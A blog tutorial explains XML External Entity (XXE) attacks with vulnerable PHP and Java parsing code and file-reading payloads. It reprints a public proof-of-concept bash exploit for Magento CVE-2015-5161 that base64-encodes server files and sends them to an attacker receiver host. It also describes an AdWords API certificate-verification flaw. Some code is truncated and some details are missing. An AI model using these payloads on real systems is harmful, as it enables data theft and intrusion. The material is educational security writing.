How to hack #4 – XML External Entity Processing


Today, we use XML files over JSON because of old, legacy applications which support communication only using XML files (for example SOAP) or because the XML Schema which is much more adult than JSON Schema or Swagger. Or you like XML or… you use Java! Anyway, regardless of the reason for your decision using this standard may be dangerous and today I want to show you one of the attacks called XML External Entity Processing (XEE).

Simple example

Let’s say we give possibility to upload an XML file similar to the one below


Our script which handles the XML file is:

$xml = $_POST['xml'];
$xml = simplexml_load_string($xml, SimpleXMLElement::class, LIBXML_NOXMLDECL);
// do some stuff
echo 'You just imported product: '.$xml->children().'?';

Very simple, isn’t it? We just get the input, parse it and display the product’s name. What can go wrong? Let’s take a step backward and take a look at XML Entities. There are 3 types of XML entity declarations: internal (parsed), external (parsed) and external (unparsed). We will be interested in the last one.

A very simple syntax of the Entities is showed below

<?xml version="1.0" standalone="yes" ?>
<!DOCTYPE author [
  <!ENTITY my_name "James Bond">

Simplifying, the entities are like variables. We can put a static text there or try to load it from some other source. What can be the source? Any file accessible from the internet or file from the local filesystem. Can you see what I am going to do?

We have an application which handles the XML we provide and displays name of a product which was just imported. Let’s try to read configuration. The configuration file is called config.ini. To load any file in filesystem where the script has access we can use syntax as below

<!DOCTYPE foo [ <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "some_file.txt" >]>

Thanks to SYSTEM directive you can read any file. Firstly, let’s try to load the configuration file. Ready XML is available below:

<!DOCTYPE foo [ <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "some_file.txt" >]>


In my case, the script returns output as below:

Cool, isn’t it?! That’s not all because we can read ANY file where the web server has access to.

If you have “expect” module installed in PHP you can get RCE (Remote Code Execution) which gives much more possibilities to escalate vectors of attacks and give you full control over the application.

Moreover, we can reproduce the same vulnerability in other languages like Java:

import org.w3c.dom.*;
import org.xml.sax.SAXException;

import javax.xml.parsers.*;

public class XeeMain {
    public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException {
        DocumentBuilderFactory factory =
        DocumentBuilder builder = factory.newDocumentBuilder();

        StringBuilder xmlStringBuilder = new StringBuilder();
        xmlStringBuilder.append("<!DOCTYPE foo [ <!ELEMENT foo ANY >\n" +
                "   <!ENTITY xxe SYSTEM \"/etc/hosts\" >]>\n" +

        ByteArrayInputStream input =  new ByteArrayInputStream(
        Document doc = builder.parse(input);

        System.out.println("Product name:");


So no one can sleep peacefully today…

Some real vulnerabilities


Do you know Magento? Magento is one of the most popular e-commerce platform written with PHP with thousands of downloads. Magento uses Zend Framework (ZF) as main library which provides lot’s of usefull libraries and classes. Unfortunatelly, in ZF/Xml component a vulnerability was found which affected Magento CE <= and Magento EE <= The vulnerability was found in ZendFramework-1.12.13/library/Zend/Xml/Security.php and ZendFramework-2.4.2/library/ZendXml/Security.php. The whole exploid can be found below:

# POC Exploit (v1.1)
# eBay Magento CE  <=  XML eXternal Entity Injection (XXE) on PHP-FPM
# eBay Magento EE  <=
# CVE-2015-5161
# Credits:
# Dawid Golunski
# dawid (at)
# Advisories:
# Usage:
# [Vulnerability test]
# This is to test the vulnerability with a simple XXE payload which retrieves the
# /dev/random file and causes a time out. No receiver server is required in this
# test as no data is returned.
# Run the script with just the URL to Magento SOAP API, with no other parameters. 
# E.g:
# ./ http://apache-phpfpm/magento/index.php/api/soap/index
# [File retrieval from the remote server]
# E.g:
# ./ http://apache-phpfpm/magento/index.php/api/soap/index /etc/hosts 80
# In this example, file extracted via the XXE attack will be sent as base64 encoded parameter to:
# You should have the receiver server/script listening on the specified port before running this exploit.
if [ $# -ne 1 ] && [ $# -ne 4 ] ; then 
  echo -e "\nUsage: \n"
  echo -e "[Vulnerability test]\n"
  echo -e "$0 MAGENTO_SOAP_API_URL"
  echo -e "E.g:"
  echo -e "$0 http://fpmserver/magento/index.php/api/soap/index\n";
  echo -e "[File retrieval]\n"
  echo -e "E.g:"
  echo -e "$0 http://fpmserver/magento/index.php/api/soap/index /etc/hosts 80\n";
  exit 2;
if [ $# -eq 4 ]; then 
if [ $TEST_ONLY -eq 1 ]; then 
  # Vulnerability test 
  # Perform only a test by reading /dev/random file
  TEST_PAYLOAD_XML='<?xml version="1.0" encoding="UTF-16"?>
  <!DOCTYPE foo [  
  <!ENTITY % xxe SYSTEM "file:///dev/random" >
  echo "$TEST_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
  echo -e "Target URL: $TARGETURL\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\n"
  # Fetching /dev/random should cause the remote script to block
  # on reading /dev/random until the script times out.
  # If there is no delay it means the remote script is not vulnerable or 
  # /dev/random is not accessible.
  START=$(date +%s)
  wget -t 1 -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
  END=$(date +%s)
  DIFF=$(expr $END \- $START )
  if [ $DIFF -eq $TIMEOUT ]; then
    echo "Vulnerable. No response from Magento for $DIFF seconds :)"
    exit 0
    echo "Not vulnerable, or there is no /dev/random on the remote server ;)"
    exit 1
  # File retrieval XXE payload
  SEND_DTD="<?xml version=\"1.0\" encoding=\"UTF-8\"?>
  <!ENTITY % all \"<!ENTITY &#37; send SYSTEM 'php://filter/read=/resource=http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php?D=%file;'>\">
  SEND_DTD_B64="`echo "$SEND_DTD" | base64 -w0`"
  FILE_PAYLOAD_XML="<?xml version=\"1.0\" encoding=\"UTF-16\"?>
  <!DOCTYPE foo [  
  <!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=$FILE\">
  <!ENTITY % dtd SYSTEM \"data://text/plain;base64,$SEND_DTD_B64\">
  # Retrieve $FILE from the remote server and send it to $RECEIVER_HOST:$RECEIVER_PORT
  echo "$FILE_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
  echo -e "Target URL: $TARGETURL\n\nInjecting XXE payload to retrieve the $FILE file..."
  echo -e "If successful, Base64 encoded result will be sent to http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php/D=[base64_result]\n"
  echo -e "If in doubt, try the vulnerability test option.\n"
  wget -t 1 -v -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE


The author of the CVE-2015-5161 wrote:

As we can see from the code, the application disables the entity loader (via libxml_disable_entity_loader), it also disables network access (LIBXML_NONET), and it additionally scans provided XML for the presence of XML entities to prevent potential entity expansion attacks. The code succesfully prevents most XXE attacks. However, as the PHP libxml_disable_entity_loader() function was reported not thread safe (the entity loader setting could potentially get overwritten between hits in FPM processes), Zend Framework does not use it when the application is hosted in a PHP-FPM environment. Instead, another approach is taken to prevent the XXE attacks.

What’s worth to stress that all libraries or applications which use the ZF component were affected.

Google AdWords API

Another problem was found in Google AdWords API. What is it? “The AdWords API allows apps to interact directly with the AdWords platform, vastly increasing the efficiency of managing large or complex AdWords accounts and campaigns”.

For security reasons, Google AdWords API can only be accessed via HTTPS. However, the above code does not set appropriate SSL settings on the https:// stream context. It fails to assign Certificate Authority (CA), and turn the verify_peer option to ON. It uses the stream_context_get_default() to get the default context, which on all PHP versions below PHP 5.6.x (see references below) does not validate the CA by default. Because of this, applications using the AdWords API library may be tricked into retrieving data from untrusted sources pretending to be

The vulnerability was found in the code below:

  protected function loadWsdl($wsdlUri, $proxy = null) {
    // Set proxy.
    if ($proxy) {
      $opts = array(
          'http' => array(
              'proxy' => $proxy,
              'request_fulluri' => true
      $context = stream_context_get_default($opts);
    $this->dom = new DOMDocument();
    $this->serviceNamespace =

To exploit the application you have to use another attack called [Man In The Middle](


XML files are very popular, JSON or YAML formats cannot threaten him. However, (as always) we need to be careful with it because the vector of attack can come from almost any direction. Do you know any other ways to attack XML format/parsers? Share with it in the comments!